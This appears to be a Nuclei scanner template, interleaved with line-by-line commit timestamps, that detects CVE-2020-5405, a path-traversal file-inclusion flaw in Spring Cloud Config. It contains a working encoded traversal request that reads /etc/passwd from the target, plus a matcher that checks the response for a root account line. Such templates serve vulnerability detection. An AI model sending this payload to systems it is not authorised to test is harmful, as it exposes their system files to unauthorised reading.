2021-01-02 04:56:15 +00:00
id : CVE-2020-5405
2020-07-06 16:22:18 +00:00
info :
2022-07-26 13:45:11 +00:00
name : Spring Cloud Config - Local File Inclusion
2021-06-09 12:20:56 +00:00
author : harshbothra_
2021-09-10 11:26:40 +00:00
severity : medium
2022-07-26 13:45:11 +00:00
description : Spring Cloud Config versions 2.2.x prior to 2.2.2, 2.1.x prior to 2.1.7, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files through the spring-cloud-config-server module.
2022-04-22 10:38:41 +00:00
reference :
- https://pivotal.io/security/cve-2020-5405
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-5405
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-5405
cwe-id : CWE-22
2022-04-22 10:38:41 +00:00
tags : cve,cve2020,lfi,springcloud
2020-07-06 16:22:18 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
2020-07-06 17:10:05 +00:00
matchers-condition : and
2020-07-06 16:22:18 +00:00
matchers :
- type : status
status :
- 200
2020-07-06 17:10:05 +00:00
- type : regex
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2020-07-06 17:10:05 +00:00
part : body
2022-07-26 13:45:11 +00:00
# Enhanced by mp on 2022/07/22